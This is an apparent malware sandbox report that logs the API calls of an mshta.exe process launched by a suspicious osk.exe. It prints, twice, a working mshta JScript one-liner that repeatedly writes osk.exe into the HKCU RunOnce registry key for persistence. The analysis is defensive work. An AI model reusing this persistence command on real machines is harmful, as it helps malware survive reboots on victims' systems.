| System | Get Time | type = Performance Ctr, time = 24471165271 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24471172929 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24473349405 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24473361086 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24476486307 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24476498193 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24478042840 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24478050956 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24479595108 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24479625144 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24481167913 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24481199751 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24482723892 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24482755985 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24485852205 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24485880853 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24488975352 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24489005394 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24492100555 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24492125851 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24494137713 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24494173187 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24496794929 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24496830689 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24498367508 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24498394552 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24499915466 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24499944806 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24503048252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24503081598 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24504612621 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24504626621 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24507724072 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24507739611 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24509523228 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24509538141 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24510848521 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24510863843 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24512419252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24512433786 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24515553266 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24515568715 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24518658100 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24518671928 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24520274841 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24520287450 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24523510457 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24523522990 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24526484232 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24526497764 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24528032794 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24528044960 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24531184061 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24531197985 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24534308744 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24534323447 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24537429263 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24537442236 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24538970994 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24538982064 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24542180325 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24542195029 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24543663779 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24543679201 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24546910655 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24546924915 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24549916198 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24549931182 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24556180618 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24556195156 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24556220583 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24556229325 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24557733105 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24557744754 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24560860922 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24560875399 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24564005564 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24564020310 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24565604173 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24565618837 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24571993548 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24572008267 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24572034279 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24572043176 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24574944594 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24574958068 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24576495374 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24576510183 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24579605308 |
|
1 | |
|
For performance reasons, the remaining 320 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0xf9c
11
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22837280527 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22837340735 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23524413948 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23534971694 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24478570028 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24489028178 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24495250961 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24498416987 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25251842955 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25269529554 |
|
1 |
Thread 0x9e4
6
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\jscript9.dll, base_address = 0x71620000 |
|
1 | |
| System | Get Time | type = Ticks, time = 248062 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:26 (UTC) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x824
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\jscript9.dll, base_address = 0x71620000 |
|
1 |
Thread 0xea8
3
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Get Time | type = Ticks, time = 244750 |
|
1 | |
| System | Get Time | type = Ticks, time = 244875 |
|
1 |
Process #10: mshta.exe
4386
1
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\mshta.exe |
| Command Line | mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\shwlwook',i);}catch(e){}},10);" |
| Initial Working Directory | C:\Users\FD1HVy\AppData\Roaming\ |
| Monitor | Start Time: 00:04:10, Reason: Child Process |
| Unmonitor | End Time: 00:05:21, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd00 |
| Parent PID | 0x6cc (c:\users\fd1hvy\appdata\roaming\osk.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E38
0x
8E8
0x
BEC
0x
E5C
0x
FC8
0x
F70
0x
BFC
0x
8F4
0x
E60
0x
E40
0x
4B8
0x
EC4
0x
FA0
0x
FF4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| jscript9.dll | 0x716A0000 | 0x71A24FFF | Marked Writable | - | 32-bit | - |
|
|
|
| mshta.exe | 0x01320000 | 0x01327FFF | Forced | - | 32-bit | - |
|
|
|
| buffer | 0x080C0000 | 0x080DFFFF | Marked Executable | - | 32-bit | - |
|
|
|
Threads
Thread 0xe38
3981
1
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Environment | Get Environment String | name = JS_DEBUG_SCOPE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| System | Get Time | type = Ticks, time = 254625 |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000D00, desired_access = FILE_MAP_WRITE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE, value_name = Path, type = REG_NONE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\mshta.exe, process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility, value_name = mshta.exe, type = REG_NONE |
|
1 | |
| System | Get Info | - |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x74b70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetCoalescableTimer, address_out = 0x74ba3c80 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\WINDOWS |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x72440000 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| System | Get Time | type = Ticks, time = 255328 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25542052685 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID_NAME, result_out = 00000409 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x74100000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = 471, address_out = 0x741845d0 |
|
1 | |
| Module | Load | module_name = WLDP.DLL, base_address = 0x723e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x723e3c20 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25555915287 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:29 (UTC) |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25555925438 |
|
1 | |
| URL | Query Info | url = javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\shwlwook',i);}catch(e){}},10);, query_options = QUERY_IS_SECURE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1051304884-625712362-2192934891-1000 |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 76972032 |
|
1 | |
| Module | Load | module_name = ext-ms-win-ntuser-touch-hittest-l1-1-0.dll, base_address = 0x74b70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterTouchHitTestingWindow, address_out = 0x74ba3b50 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575847217 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575907710 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575933768 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575940149 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575946464 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575981759 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25575990960 |
|
1 | |
| System | Get Time | type = Ticks, time = 255718 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25576071328 |
|
1 | |
| Window | Create | wndproc_parameter = 76849872 |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 76849872 |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40 |
|
1 | |
| Module | Map | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Module | Map | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x71fa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleacc.dll, function = LresultFromObject, address_out = 0x71faf590 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = mshtml.dll, base_address = 0x726c0000 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25693739200 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25693821254 |
|
1 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = JS_DEBUG_SCOPE |
|
1 | |
| Debug | Check for Presence | c:\windows\syswow64\mshta.exe |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x74f71cd0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729868046 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729880049 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729895337 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729905567 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729917993 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729927738 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729932508 |
|
1 | |
| System | Get Time | type = Ticks, time = 257265 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25734995799 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernelbase.dll, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x74f9a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7500d8e0 |
|
1 | |
| Environment | Get Environment String | name = JS_PROFILER |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 257312 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
2 | |
| System | Get Time | type = Ticks, time = 257312 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| COM | Create | interface = 8F88FD19-5D42-477B-BD45-F6A4A977ED05, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 257328 |
|
3 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 261 |
|
1 | |
| System | Get Time | type = Ticks, time = 257703 |
|
1 | |
| COM | Get Class ID | cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 257703 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25775003483 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25775018723 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25775024713 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-winrt-l1-1-0.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-winrt-string-l1-1-0.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\combase.dll, function = WindowsCreateStringReference, address_out = 0x75d0a150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\combase.dll, function = RoGetActivationFactory, address_out = 0x75d00fa0 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 257718 |
|
1 | |
| Window | Create | class_name = WorkerW, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = WorkerW, index = 0, new_long = 10683448 |
|
1 | |
| Window | Set Attribute | class_name = WorkerW, index = -4, new_long = 1926608192 |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 257718 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 257718 |
|
3 | |
| Window | Find | class_name = MS_AutodialMonitor |
|
1 | |
| Window | Find | class_name = MS_WebCheckMonitor |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776268947 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776277411 |
|
1 | |
| System | Get Time | type = Ticks, time = 257718 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776383325 |
|
1 | |
| System | Get Time | type = Ticks, time = 257718 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25777359917 |
|
1 | |
| System | Get Time | type = Ticks, time = 257734 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25777481411 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25777517164 |
|
1 | |
| System | Get Time | type = Ticks, time = 257906 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25794715316 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25794735009 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25794826888 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25794833523 |
|
1 | |
| System | Get Time | type = Ticks, time = 257906 |
|
3 | |
| System | Get Time | type = Ticks, time = 257921 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795558032 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795565170 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795574801 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795581518 |
|
1 | |
| System | Get Time | type = Ticks, time = 257921 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Time | type = Ticks, time = 257921 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 25796264828 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25796645780 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25796790880 |
|
1 | |
| System | Get Time | type = Ticks, time = 258031 |
|
1 | |
| System | Get Time | type = Ticks, time = 258062 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\EUDC\1252 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1000, y_out = 495 |
|
1 | |
